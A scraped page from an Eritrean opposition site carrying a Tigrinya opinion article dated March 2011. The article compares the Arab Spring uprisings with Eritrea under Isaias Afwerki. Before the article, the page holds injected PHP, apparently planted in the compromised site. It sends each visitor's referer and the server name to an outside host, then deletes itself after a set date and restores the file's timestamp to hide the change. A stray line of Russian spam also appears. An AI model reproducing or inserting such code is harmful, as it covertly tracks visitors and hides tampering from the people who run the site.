check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727708){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } ድሕሪ ኣቦኻ ሞት ጊደኻ
кремлевская диета

ድሕሪ ኣቦኻ ሞት ጊደኻ

User Rating: / 0
PoorBest 

 

 

 

 

ድሕሪ ኣቦኻ ሞት ጊደኻ

ኣብዚ ክልተ ኣዋርሕ ንኣቓልቦ ዓለምና ስሒቡ ዝርከብ ነገር እንተሃልዩ እዚ ኣብ ሃገራት ሰሜን ኣፍሪቃን ሃገራት ማእከላይ ምብራቅን ጋልፍን ካብ ሓደ ናብ ካልእ ሃገር እንዳላሓመ ዝከይድ ዘሎ ህዝባዊ ማዕበል እዩ። ኣብዘን ዝተጠቅሳ ሃገራት ንዓሰርተታት ዓመታት ኣብ ኮረሻ ስልጣን ተኾይጦም ንሃብትን ጸጋታት እተን ሃገራት ከም ናይ ውልቆምን ቤተሰቦም ብምግባት ነቲ ህዝቢ ኣብ ድኽነት፡ ድንቁርናን ጭቖናን ምሓዞም ከይኣክል ስልጣን ከም ናይ ውልቆም ብምግባት ከም ውርሻ ናብ ደቆም ንምስግጋር ኣብ ዝቀራረብሉ ዝነበሩ እዋን እምቢ ንምልኽን ጭቆናን ብምባል እዚ ህዝባዊ ዓመጽ ሃንደበት ዝልዓዓል ዘሎ። ድሮ ክልተ ካብዞም ኣዝዮም ዝፍርሑን ዝትንከዩን ዘይመስሉ ዝነበሩ መለኽቲ ካብ ስልጣን ከምዝእለዩ ኮይኖም ኣለዉ፡ መራሒ ሊብያ መሓመድ ገዳፊ ድማ ኣብ ናይ መወዳእታ መዓልታቱ በጺሑ፡ ነተን ናይ መወዳእታ ካርትኡ ይጣልዓለን ከምዘሎ ህዝብን ዓለምን ዝርእዮ ዘሎ ጉዳይ እዩ። ኣብተን ዝተረፋ ሃገራት ዘለዉ ነዚ ህዝባዊ ማዕበል ንምዕጋት ንመነባብሮ ህዝቢ ንምምሕያሽ ዘይተ ኣደነ ሚልዮናት ክስልዑ ከለዉ፡ ገለ ድማ ብድሕሪ ኣብ ስልጣን ክጸንሑ ምዃኖምን ናብ ደቆም ምትሕልላፍ ምውራስን ዝብሃል ሓሳባት ከምዘይብሎም ክገልጹ ተራእዮም ገለ ድማ ድሮ ናይ ፖለቲካ እሱራት ብምፍታሕን ነቲ ዝነበረ ምልካውያን መንግስታት ብምፍራስ ንናይ ህዝቢ ድልየት ከማእክ ዝኽእል ለውጢ ምትእትታው ጀሚሮም ኣለዉ። እዚ ግን ነቲ ህዝባዊ ናዕቢ ካብ ምዝሕሓል ሓሊፉ ክዓግት ኣይክኣለን።

ኣብ ታሪኽ ዓለምና፡ እዚ ከምዚ ዓይነት ህዝባዊ ናዕብታት ውይ ድማ ስትራተጂካዊ ዘይጎነጻዊ ህዝባዊ ዓመጻት ኣብ ብዙሓት ሃገራት ካብ ምልኪ ናብ ዲሞክራሲ ኣብ ምስግጋር ዓቢ ተራ ተጻዊቱ እዩ። ንኣብነት እቲ ናብ መላእ ምብራቕ ኤውሮጳ ዝላሓመ ንውልቀ መላኺ ኒኮላስ ቻውቸስኮ ኣብ 1989 ካብ ስልጣን ዝዓለወ ህዝባዊ ናዕቢ ሩመንያ ንዓለምና ናብ ሓድሽ መድረኽ ኣብ ምብራቕ ኤውሮጳ ድማ ሓድሽ ንፋስ ዲሞክራሲ ከምዝነፍስ ከምዝገበረ ይዝከር። ቅድሚ’ዚ ድማ ኣብ ኢራን ንምልኺ ስርዓት ሻሕ፡ ኣብ ፊሊፒንስ ድማ ንፈርዲናን ማርቖስ፡ ድሒሩ ድማ ኣብ ዩጎስላቭያ ንሚሎሶቪች ካብ ስልጣን ከምዝእለ ጌሩ እዩ። እዚ ሕጂ፡ ኣብ መወዳእታ ናይ 2010 ዝተባርዐ ኣብ ወርሒ 14 ጥሪ ዝተዛዘመ  ኣብ ቱንዝያ ዝተራእየ ህዝባዊ ናዕቢ ኣብዚ ምጅማር እዚ ሓዲሽ ዓመት ንዓለምና ብፍልይ ድማ ኣፍሪቃ ናይ ብሩህ ተስፋ ባብ ዝኸፈተ እዩ እንተተባህለ ምግናን ኣይኮነን።

እዚ ህዝባዊ ናዕቢ ናብ መላእ ሰሜን ኣፍሪቃ ብፍልይ ድማ እተን ናይ ዓሰርተታት ዓመታት ውልቀ-መለኽቲ ወተሃደራዊ ዕብለላ ዝተሳቐያ ሃገራት ኣዕራብ ማለት፡ ግብጺ (ብሑስኒ ሙባረኽ)፡ ኣልጀርያ (ብታፈሊቃ) ሊብያ (ማዑመር ቃዛፊ) ሱዳን (ኣልበሽር)፡ ሊሕሙ ለውጢ ናይ ምምጻእ ተኽእሎ ኣለዎ ዝብል ብዙሕ ትንተናታት እዩ ክውሃቦ ጸኒሑ፡ ኣብዚ እዋን ግን ካብ ትንተናን ግምታትን ሓሊፉ ህያው ብምዃን ንናይ ዓለምና ኣቃልቦ ስሒቡ ዝርከብ ኩነታት ኮይኑ ንረኽቦ። እዚ ህዝባዊ ማዕበል ሓደ ድሕሪ ሓደ ካብ ቱንዝያ ናብ ግብጺ፡ ካብ ግብጺ ናብ  ሊብያን ባሕሬን እንዳበለ ንመላእ ሃገራት ኣዕራብን ሰሜን ኣፍሪቃን ማለት የመን፡ ዮርዳኖስ፡ ጁቡቲ፡ ሱዳን መሮኮን ሊሒሙ ኣሎ። ናብ ካልኦት ሃገራት ትሕተ ሳህራ ኣፍሪቃን ካልኦት ሃገራት ናይ ምልሓም ተኽእሎ ከምዘሎ ተንተንቲ ይዛረቡ። ድሮ ሓደ ካብዞም ውልቀ-መለኽቲ ሑስኒ ሙባረኽ ግብጺ ድሕሪ ን18 መ ዓልታት ዝተኻየደ ህዝባዊ ዘይጎነጻውን ኣገባብ ካብ ስልጣን ታኣልዩ ኣሎ። እዚ ጹናማዊ ህዝባዊ ዓመጽ ከምቲ ኣብ ምብራቅ ኤውሮጳ ኮሚኒስታውያን ዲክታተራት ብምኽታም ንፋስ ምስግጋር ናብ ዲሞክራሲ ዝተበሰረ ኣብ መላእ ሴሜን ቲሕተ ሳህራን ማእከላይ ምብራቅ ክብሰር ምዃኑ ድሮ ርግጸኛ ጉዳይ ኮይኑ ኣሎ።

እዚ ህዝባዊ ዓመጽ ፖለቲካዊ ዘይምርግጋእን ብቀሊሉ ዶው ናይ ምባል ኣንፈት ዘርኢ ኣይኮነን። እዚ ምዕባለ ንብዙሓት ሃገራት ኣተባቢዑን ንብዙሓት መንእሰያት ኣብ ሓደ ኣተሓሳስባን ንዲክታተራቶም ናይ ምእላይ ክእለቶም ከምዝድንፍዕን፡ ዝኾነ ዲክታተራዊ ስርዓት ብዘይደገፍን ምእዙዝነት ህዝቢ ንሓንቲ መዓልቲ እዃ ክሓድር ከምዘይክእል ዘምሃረ ኣብነታዊ ተርእዮ እዩ። ብተወሳኺ፡ ሓንሳብ ህዝቢ ካብ ፍርሒ እቲ ዲክታቶርን ናይ ጸጥታ ማሓውራቱ እንተተናጊፉ፡ ነቲ ጹናማዊ ሓይሉ ክዓግት ዝክእል ከምዘየለ ብተግባር ኣብ ግብጽን ቱንዝያን ሕጂ ድማ ኣብ ሊብያን ኣብ ምርግጋጽ ዘሎ ጉዳይ እዩ።  

እዚ ኣብ ግብጺ ን18 መዓልታት ዝተራእየ ብዙሕ ደይብ ውረድ ዝነበሮ ግን ድማ ኣብ መወዳእታ ብምእላይ ስልጣን ሙባረኽ ዝተዛዘመ ተርእዮ ንዓለምና ናብ ሓድሽ ፖለቲካዊ ዲፖሎማስያዊ መድረኽ በቲ ሓደ ሸነኽ ክመርሓ እንከሎ፡ ብኻልእ ሸነኽ ድማ ንህዝብታት ዓለምና ንህዝባዊ ማዕበል ንግዚኡ ዘባኽር ዲክታተራዊ ስርዓት ድኣምበር ምሉእ ብምሉእ ንህዝባዊ ናዕብን ሓይልን ህዝቢ ኮቶ ጠጠው ከብል ዝኽአል ከምዘየለን ብኣብነት ዘርኣየ መድረኽ እዩ። ንህዝብታት እቲ ዞባ ሓሊፉ ንናይ ኣውሮጳ መንእሰያት ዘበራበረ፡ ንናይ ህዝቢ ሓይሊ ናብ ቦትኡ ዝመለሰን ንመንእሰያት ድማ ናይ መጻኢኦም ናይ ምውሳን ዕድል ኣብ ኢዶም ከምዘሎ ዘርኣየ ዓቢ ኣብነታዊ ሰውራ ኮይኑ ንረኽቦ። ኣብዚ ክዝንጋዕ ዘይብሉ ነፍሲወከፍ መላኺ ንኣብ ቱንዝያ፡ ግብጺ ሕጂ ድማ ሊብያ ዘሎ ኹነታት ብጭንቀት ይከታተሎ ከምዘሎ ፍሉጥ ኮይኑ፡ ብኣንጻሩ ድማ ነፍሲ ወከፍ ኣብዘን ብምልኪ ዝተበልዓ ሃገራት እቲ ካባቢ ዝርከብ መንእሰይ ድማ እዞም መለኽቲ ሓደ ብሓደ ኣብ ዝወድቅሉ እዋን ነቲ ጉዳይ ብተስፋ ብሩህ መጻኢ ሃገራት ዘበሰረ ኩነታት ጌሩ ይከታተሎ ምህላዉ ርዱእ ነገር እዩ። ምኽንያቱ እዚ ህዝባዊ ምንዕዓብ እስላማዊ ትሕዝቶ ዘይብሉ፡ ናይ ወጻኢ ሓይሊ ንዲክታተራዊ ስርዓት ምዕላው ተባሂሉ ዝግበር ዘሎ ዘይኮነ፡ ጭቆና ዝመረሮ ህዝቢ ዘላዓዓሎ ፍሉይን ዕውትን ሰውራ ምዃኑ እዩ።  ስለዚ እቲ ክግበር ዘለዎ ነዚ ብሩህ ተስፋ ኣብ ሰሜን ኣፍሪቃን ኣዕራብን ባብ ዝኸፈተ ህዝባዊ ዓመጽ ምጽንባሉን ነቶም ኣብቲ ከባቢ ዘለዉ ምልካውያን ስርዓታት ብትብዓት ክገጥሞም ምዃና መልእክቲ ዝሰድድን እዩ። ኣብ ርእሲ’ዚ እዚ ኣቲናዮ ዘሎና መድረኽ ካብ ሕጂ ንዳሓር ንጠለባት ህዝቦም ጥሒሶምን ንድልየትን ራእን መንእሰያት ረጊጾም ክሰሩ ዝኽእሉ መራሕቲ ከምዘየለዉ እዩ።

እዚ ኣብ ቱንዝያን ግብጽን ዝተራእየ ዕውት ህዝባዊ ናዕቢ ንዓለምና ዝማሃራ ነገር እንተሃልዩ፡ ህዝብታት እቲ ዞባ መንግስቶም ክልውጡን ክግልብጡን ኣብ ዝደለይሉ እዋን ሓገዝ ጎራበብቲ ሃገራት ይኹን ከምቲ ቅድሚ ሕጂ ዝነበረ ሓገዝ ምዕራባውያን ሃገራት ከምዘየድልዮም እዩ። እዚ ኣብ ዝሓለፈ ንቱንዝያዊ ዲክታተር በን ዓሊን ምባረኽን ካብ ስልጣን ዘወገደ ተርእዮ ህዝቢ ይኣክል እንታሉ ብገዛእ ርእሲን ኣብ ዓቅሙን ተሞርኪሱን ናይ መጻኢ ዕድሉ ክውስን ይክእል ምዃኑ እዩ።

እወ ብናይ ደገን ጎረባብቲ ሃገራትን ይኹና ምዕራባውያን ሃገራት ሓገዝ ዝመጽእ ለውጢ ኣብ ዒራቅ፡ ኣፍጋኒስታን ሶማልያን ከምጽኦ ዝኻኣለ ሰላም ምርኣይ ባዕሉ ኣካሊ መርትዖ እዩ። እዚ ዘርእየና እተን ናይ ደገ ሓይልታት ካብ ነቲ ለውጢ ምምጻእ ንናተን ረብሓ ከምዘቐድማ ርዱእን መባኢታዊ ፖለቲካዊ ፍልጠት ምዃኑ እዩ። ነዚ ኣብ ሕቶ ምልክት ምእታው ድማ የዋህነትን ጥራይ እዩ። ከም ኣብነት እንተሪኢና ምዕራባውያን ሃገራት ነዞም ኣብ ሰሜን ኣፍሪቃ ይኹን ማእከላይ ምብራቅ ዝርከቡ ውልቀ-መለክቲ ካብ ናይ ስለያዊ ሓገዝ ምግባር ሓሊፈን ብንዋትን ሞራላዊ ሓገዝን እንዳ ኣዕጠቃ ኣብ ስልጣን ንነዊሕ ተኮይጦም ከምዝጸንሑ ኣብ ምግባር ክሰርሓ ጸኒሐን። ከም ኣብነት ሑስኒ ሙባረኽን በን ዓሊ’ውን ኣዕሩኽ ምዕራባውያን ሃገራት ብምዃን እዮም ንረብሐአን ክብሃል መለኽቲን ጨኮንቲን ምዃኖም እንዳተፈልጠ ኣብ ስልጣን ከምዝጸንሑ ኮይኖም። ስለዚ ህዝቢ ብገዛእ ርእሱ ብናቱ ዓቅምን ለውጢ ናይ ምምጻእ ክእለት ኣብ ምድላብን ርእሰ ታኣማንነት ኣብ ምሕዳርን እዚ ከምዚ ዓይነት ስትራተጂካዊ ዘይጎነጻዊ ህዝባዊ ዓመጽ ዓቢ ተራ ኣለዎ። ስለዚ ሓቀኛ ለውጢ ክረጋገጽ ዝኽእል ህዝቢ ኣብ ናቱ ግዜን ብናቱ ኣጀንዳን ተላዓዒሉ ንነብሱ ኣብ ሓደጋ ብምእታው ነቲ ለውጢ ባዕሉ ምስ ዘረጋግጾ ጥራይ እዩ።

እዚ ናይ ሎሚ ቅነ ምልዕዓላት ዝምሃረና ነገር እንተሃልዩ፡ ንናይ ምዕራብ ይኹን ናይ ውልቁ ረብሓ ኢሉ ኣብ ስልጣን ዝጸንሐ ውልቀ-መላኺ ህዝቢ እንድሕሪ ሆ ኢሉ ተላዒሉ ዝዓግቶ ከምዘየለ እዩ። ዋላ ፖሊስ ኣብ ልዕሊቶም ዕጥቂ ዘይነበሮም ሰልፈኛታት ቶኽሲ እንተኸፈቱ፡ ዋላ ሰራዊት እንተተንቀሳቐሰ፡ ዋላ ነዚ ናዕቢ ዘልዓዕልዎ ዘለዉ “ግብረ-ሽብራውያን” እንተተባህለ፡ ዋላ መንነቶም ዘይተፈልጡ ናይ ወጻኢ ሓይልታት ምትእትታው ኣሎ ዝብል ክሲ እንተቀረበ ነቲ ኣብ ጎደናታት ቱንዝያ ግብጽን ካልኦት ሃገራትን ዝተራእየ ዓመጽ ደው ከብል ዝኽእል ሓይሊ የለን። እቲ ምንታይሲ ዝተባህለ ይብሃል እቲ ህዝባዊ ዓመጽ ዘለዓዓለ ጉዳይ ክውሃቦ ዝኽእል መግለጺ እንተሃልዩ፡ ጭቆና ድኽነት ዘልዓሎ ምዃኑ እዩ። ነፈርቲ ኩናት፡ ታንክታት ይኩን ሚሳይላት፡ ይቶከስ ንማዕበል ህዝቢ ክዓግት ከምዘይክእል እዚ ኣብ ናይ ጻዕረሞትን ናይ መወዳእታ ትንፋስን ዝርከብ ንሊብያ ን42 ዓመታት ዝገዝአ መላኺ ኮለኔል ሙሓመድ ገዳፊ ዘጋጥሞ ዘሎ ብድሆታት ምርኣይ ጥራይ ኣካሊ እዩ። ገዳፊ ብታህዲድን ፈከራን ንመዓልታት ዕምሩ ከናውሕ ይክእል ይኸውን፡ እንተኾነ ግን ህዝቢ ሊብያ ሓንሳብን ንሓዋሩን ካብ ዝነበሮ ፍርሑ ተላቂቁ ሓደ ብሓደ ከተማታት ካብ ናይ ጸጥታ ትካላት፡ ውሑዳት ደገፍቲ ገዳፊ ነጻ እንዳውጽአ ንዕምሪ ስርዓት ገዳፊ ካብ ናይ መ ዓልታት ናብ ሰ ዓታት እንዳቐየረ እዩ ዝርከብ። ንሓይሊ ህዝቢ ብሓይሊ ብረት ከምበርክ ዝፍትን ስርዓት ኮቶ ስዑርን ፍሹለሉን ምዃኑ እዩ።

ምኽንያት እዚ ሃንደበታዊ ህዝባዊ ምልዕዓል ዝተራእየለን ሃገራት ፖለቲካዊ ቁጠባውን ኩነታት እተን ሃገር ዝምልከት እዩ። ኣብ ታኼላ ምልኺ ዝተሸማ፡ ናይ ነዊሕ እዋን ጽምኢ ናጽነትን ሓርነት ዘለዎ፡ ካብ ፖለቲካዊ ውሳኔታት እቲ ሃገር ዝተገለለ፡ ርግኣት ቅሳነትን ዝስኣነ ህዝቢ ዝተላዕለ እዩ። ብካልእ ሸነኽ እዚ ከምዚ ዝኣመሰለ ምንዓብን ዝልዓል ዘሎ፡ ነቲ ሓድሽ ወለዶ ዕድል ብዘይምሃብን፡ ንዓቅምን ክእለቶምን ብግቡእ ብዘይምግንዛብን ናይ መጻኢ ዕድሎም ባዕሎም ናይ ምውሳን ክእለት ክድልቡን ሃገሮም ናይ ምምራሕ ዘለዎም ዕድል ስለዝተነፍጎም እዩ።

ነዚ ኣብ ላዕሊ ዝተጠቅሰ ነጥብታብ ናብ ሃገርና ኤርትራ ብምንጽጻር እንተሪእናዮ፡ ካብ ኣብዘን ሃገራት ዘሎ ኩነታት ዝኸፍአ ፖለቲካውን ቁጠባዊ ኩነታትን ከምእንርከብ ዘከራክር ኣይኾነን። ሃገርና ብግጉይ ቁጠባዊ ፖለሲ እቲ ስርዓት ኣብ ኣዝዩ ዝኸፍአ ድኽነትን ቁጠባዊ ቅልውላው ትርከብ። እቲ ኣፍራዪ ዝብሃል ሓይሊ መንእሰይ ብምሉኡ ኣብ መወዳእትኡ ዘይፍለጥ ግዱድ ዕስክርና ተሸሚሙ መጻኢኡን መጻኢ ሃገሩን ኣብ ምምሕያሽ ክሳተፈሉ ዘይክእል ኩነታት ተሞቁሑ ይርከብ። ኣብታ ሃገር ዝኮነ ዓይነት ካብ ናይ መንግስቲ ትካላት ወጻኢ ማሕበራት ናይ ምምስራት መሰል የለን፡ ብቐንዱ ድማ ኣብታ ሃገር ሓሳብካ ይኹን እምነትካ ብናጻ ናይ ምግላጽ መሰል የለን። ብዙሓት ናይ ፖለቲካን እምነትን ሕልናን እሱራት ናብ ፍርዲ ከይቀረቡ ንዓመታት ተኣሲሮም ይርከቡ።  እታ ሃገር ኣብ ምሉእ ምቁጽጻር ውልቀ-መላዂ ኢሰያስ ኣፍወርቂ ትርከብ። ባዕሉ ሓጋጊ፡ ፈራዲን ፈጻሚን ኣካል እዩ። ኣብታ ሃገር ናጽነታ ካብ እተረጋግጽ ጀሚሩ ዝኾነ ዓይነት ምርጫን ተካይዱ ኣይፈልጥን። በዚ ኣብ ቱንዝያን ካልኦት ሃገራት ዝተራእየ መዐቀኒ እንተተራእዩ ኣብ ኤርትራ ህዝባዊ ናዕቢ ዘይኮነ ጹናማዊ ናዕቢ ቅድሚ ሽድሽተ ሸውዓተ ዓመታት ክልዓል ይግብኦ ነይሩ እንተተባህለ ምግናን ኣይኾነን። ሕጂ ድማ ማዓስ ብዘየገድስ ምልዓዓሉ ዘይተርፍ ጉዳይ እዩ።

እወ፡ ስርዓት ኢሰያስ ንናይ ዶብ ምሕንጻጽ ርእሰ-ምርኮሳን ካልእን እንዳተባህለ ንቅሩብ ግዜ ምስምሳት ብምፍጣር ኤርትራውያን ንስቓዮም ሸለል ብምባል ንጽቡቅ መጻኢ ከማዕድዉ ክገበር ክኢሊ ይኸውን፡ ኣብ ስልጣን ብምጽናሕ ንነብሱን ውሑዳት ቤተሰቡን ደገፍቱን ብሓለፋታትን ጸጋታትን እቲ ሃገር ካብ ግዜ ናብ ግዜ እንዳሓየሉን እንዳሃጠሩን ክኸዱ ጌሩ ክኸውን ክኢሉ ይኸውን፡፡ እንተዀነ ግን ዝበዝሐ ክፋል ዜጋ እታ ሃገር ብፍላይ ድማ መንእሰይ መጻኢኡ ጸልሚቱ ኣደዳ ግዱድ ዕስክርናን ስደትን መከራን ክኸውን ጌርካዮ ኣብ ስልጣን ንነዊሕ ኩድጭ ኢለ ክጸንሕ እየ እልካ ምሕሳብ ዕሽነት ጥራይ ዘይኮነ፡ ንታሪኽ ሶውራታትን ህዝባን ዓመጻት ህዝብታት ዓለምን ዕሽሽ ምባል ዘይኮነስ፡ ነዚ ኣብዚ ክልተ ኣዋርሕ ኣብ ሰሜን ኣፍሪቃን ኣብ ካልኦት ሃገራት ማእከላይ ምብራቅ ዝተካየደን ዝካየድ ዘሎ ንለውጢ ካብ ምልኪ ናብ ዲሞክራሲ ዝጠልብ ህዝባዊ ዓመጽ ምዝንጋዕ ከምዘየለ ዓይንካ ዓሚትካ ምሕላፉን እዩ። ስለዚ ስርዓት ኢሳይያስ ዘለዎ ኣማራጺ ነዚ ብምግንዛብ እቲ ስልጣን ካብ መጀመርትኡ ናይ ህዝቢ ስለዝኾነ፡ ስልጣን ናብቲ ዋንኡ ዝኾነ ህዝቢ ኤርትራ ከረክበሉ ዝኽአል መንገዲ ምንዳይ እዩ። ወይ ድማ ነቲ ዘይተርፍ ንበን ዓሊን ሙባረኽብ ካብ ስልጣን ዝኣለየ ሃንደበታዊ ዘይዕገትን ናይ ህዝቢ ኤርትራ ማዕበል ኢዱ እግሩን ኣጣሚርካ ምጽባይ እዩ።

እወ ህዝቢ ኤርትራ ዝሓዘ ሒዝዎን ልቢ ብምዕባይ ትም ስለዝበለ፡ ንለውጢ ቅሩብ ዘይኮነን ከም የዋህን ብራዕድን ፍርሕን ዝተዋሕጠ ጌርካ ክግለጽ ይክኣል ይኸውን። እዚ ግን ንናይ ትማሊ ታሪኽ ምዝንጋዕ ጥራይ እዩ። መዓስ ብዘየገድስ እዚ ህዝቢ’ዚ በቃ ይኣከል ብምባል ክልዓል ምዃኑን ካብዚ ንዓመታት ኣብ ምልኪ ሞቁሖም ሒዝዎ ዝርከብ ስርዓት ኢሳይያስ በጣጢሱ ናብቲ ንሱ ዝደልዮ ዲሞክራስያዊ ስርዓት ክሰጋገር ምዃኑ ዘጠራጥር ኣይኮነን።

እወ ከምቲ ቅድሚ ሕጂ በቃ ይኣክል፡ ብምባል ንሂወቱ ኣብ ሓደጋ ብምእታው እቲ ዝድለ መስዋእቲ ንምኽፋል እንተተላዒሉ፡ ኢሰያስን ስዓብቱን ነዚ ጽናማዊ ማዕበል ተጻዊሮም ክሰሩ ዘይምዃኖም ፍሉጥ ነገር እዩ። እቲ ምንታይሲ ብዘይ ናይ ህዝቢ ደገፍ ንኻልኢት’ውን ትኹን ክሰርር ዝኽእል ስርዓት ስለዘየለ፡ ስርዓት ኢሰያስ ውን ካብዚ ሓቂ’ዚ ዝተፈልየ ስለዘይኮነ እዩ። ስለዚ ኢሰያስን ሳዓብቱን ስልጣን ናብ ህዝቢ እንተዘይኣረኪቦም ናይ በንዓሊ ሙባረኽን ብቀንዱ ድማ ካብ ማሓዝኦም መራሒ ሊብያ ማሓመድ ቀዛፊ ተማሂሮም እቲ ዝግበር ስጉምቲ ብምውሳድ ስልጣን ናብ ዋንኡ እንተዘይኣረኪቦም ከምቲ ኣቦታት ዝምስልዎ እቲ ጉዳይ “ድሕሪ ኣቦካ ሞት ጊደኻ” ዘጠራጥር ኣይኮነን።

ማእከላይ ቤት/ጽሕፈት ኤምዲሰመ

1 መጋቢት 2011

ፕሪቶርያ

 


Add comment

Your comments are as important as the article you are commenting on. Please enrich the discussion by avoiding personal attacks. We'll publish your comment, if it meets our criteria. تعليقاتك لا تقل اهمية عن المقال المكتوب اعلاه، فالرجاء اثراء النقاش بالابتعاد عن الاساءات الشخصية. سوف ننشر تعليقك اذا استوف شروط النشر



Security code
Refresh

Enough dictatorship

Get Adobe Flash player

Arkokabay Media -----> Poem

Get Adobe Flash player

مرض الرئيس الأريتري بين الشائعة والنفي

Get Adobe Flash player

ALIA GABRES- SHE COTTON SUMMER DRESSES

Get Adobe Flash player